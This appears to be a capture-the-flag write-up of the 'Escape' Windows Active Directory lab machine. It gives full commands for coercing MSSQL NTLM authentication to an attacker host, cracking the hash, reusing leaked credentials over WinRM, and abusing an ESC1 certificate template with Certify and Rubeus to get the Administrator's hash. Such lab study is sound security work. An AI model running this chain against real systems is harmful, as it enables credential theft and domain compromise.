Escape is a medium difficulty Windows Active Directory machine that starts with an SMB share that guest authenticated users can download a sensitive PDF file. Inside the PDF file temporary credentials are available for accessing an MSSQL service running on the machine. An attacker is able to force the MSSQL service to authenticate to his machine and capture the hash. It turns out that the service is running under a user account and the hash is crackable. Having a valid set of credentials an attacker is able to get command execution on the machine using WinRM. Enumerating the machine, a log file reveals the credentials for the user ryan.cooper. Further enumeration of the machine, reveals that a Certificate Authority is present and one certificate template is vulnerable to the ESC1 attack, meaning that users who are legible to use this template can request certificates for any other user on the domain including Domain Administrators. Thus, by exploiting the ESC1 vulnerability, an attacker is able to obtain a valid certificate for the Administrator account and then use it to get the hash of the administrator user.

Enumeration

First I check for available open ports.

nmap -p- --min-rate=10000 10.10.11.202

1
nmap -sC -sV -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 10.10.11.202 -oA ./nmap/escape -Pn
Ports Service
53 domain Simple DNS Plus
88 kerberos-sec Microsoft Windows Kerberos
135 msrpc Microsoft Windows RPC
139 netbios-ssn Microsoft Windows netbios-ssn
389 ldap Microsoft Windows Active Directory LDAP
445 Windows Server 2016 Standard 14393
464 kpasswd5?
593 ncacn_http Microsoft Windows RPC over HTTP 1.0
636 Microsoft Windows Active Directory LDAP
1433 Microsoft SQL Server 2019
5985 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Next, I checked the SMB server where I found some shares.

smbclient -N -L //10.10.11.202

I did some other enumeration and found nothing interesting.

Foothold

I logged Into Public Share using anonymous login and I found a PDF.

smbclient -N //10.10.11.202/Public

Inside the PDF I found credentials to log into SQL server.

Credential -> PublicUser : GuestUserCantWrite1

Using this credential I logged in to MSSQL server.

mssqlclient.py 'PublicUser:[email protected]'

I tried to see If I could execute a command using `xp_cmdshell`` but no luck. I tried to activate it but I don’t have the permissions.

xp_cmdshell 'whoami'

sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;

I looked for databases in the server but nothing interesting.

SELECT name FROM master.dbo.sysdatabases

I started Responder in my local machine to get an NTLMv2 response by making MSSQL server read something from my localhost.

Start Responder -> sudo responder -vI tun0

Read from MSSQL -> xp_dirtree '\\10.10.14.22\myshare';

I used hashcat to crack the NTLMv2 Hash.

hashcat -m 5600 sql_svc_hash.txt /usr/share/wordlists/rockyou.txt

Password -> REGGIE1234ronnie

I used Evil-Winrm to login to the user but there was no flag.

evil-winrm -u sql_svc -p 'REGGIE1234ronnie' -i 10.10.11.202

After some enumeration I found ERRORLOG.BAK inside C:\SQLServer\Logs.

At the very end, we can see the credentials of Ryan.Cooper.

Credential -> Ryan.Cooper : NuclearMosquito3

I logged in using Evil-Winrm and got the flag.

Privilege Escalation

I tried ASREProasting and Kerberoasting but no luck

GetNPUsers.py -dc-ip 10.10.11.202 sequel.htb/sql_svc -request

GetUserSPNs.py -dc-ip 10.10.11.202 sequel.htb/sql_svc -request

I had to dig deep and Found TLS certificates on port 3269 which was by sequel-DC-CA.

openssl s_client -showcerts -connect 10.10.11.202:3269 | openssl x509 -noout -text

I uploaded Certify.exe to the victim machine and found the vulnerable certificate.

.\Certify.exe find /vulnerable

We can see the Validation period is 10 years Also the owner is Administrator. There are bad permissions listed which we can abuse as well.

Let’s run Certify with alt name administrator to get certification which we can later craft to abuse.

1
.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

We get an RSA key and Certificate.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAptfb4Z6gnih00wPublNRZnDeJew6dNUjnIK9G3ABXssfprGP
qy0qdSl4s71+m2YSaC/4uDhEIwcxLDhMqwlmMzmCv8QQmJyosvtAFUFxtAg+dpBU
--snip--
/PuJaiETVwdaoqNlswkMHKnR0s
LWZ3L+xYD9LCVDkKC7sgleaa7uScTURFCr5F2FctdBwXSdydtFwRCMGL4BHLpsDv
Svcn4kSdHqzoGeooLwlIi+j4J+2DOWdYwJBhDd4wpPauoLdLR1EU
-----END RSA PRIVATE KEY-----
----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAuikoIHtx76ygAAAAAACzANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMxMjIyMDkxMTUwWhcNMjUxMjIy
MDkyMTUwWjBTMRMwEQYKCZImiZPy
--snip--
ei9J2F4a+S18ZzwBww23Zg13HJSu
4gr2IESXJuevi5d3VZACMXXcUs2rV1QNeRfqZNSQHepPEqlX2XEJMCTsyT4Pzqhr
XgWWAS1a1QQe1UUrvE8dDT7auRt+yg==
-----END CERTIFICATE-----

We can save this in one file cert.pem and convert it to cert.pfx

1
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Next, I upload Rubeus & cert.pfx.

Now we directly include the ticket in the system or get credentials that we can use to log in via Evil-Winrm.

Option 1:

1
.\Rubeus.exe asktgt /domain:SEQUEL.HTB /user:Administrator /certificate:cert.pfx /dc:dc.SEQUEL.HTB /ptt

Option 2:

1
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials /show /nowrap

I used the 2nd option to get NTLM hash of the administrator.

After logging in I got the root flag.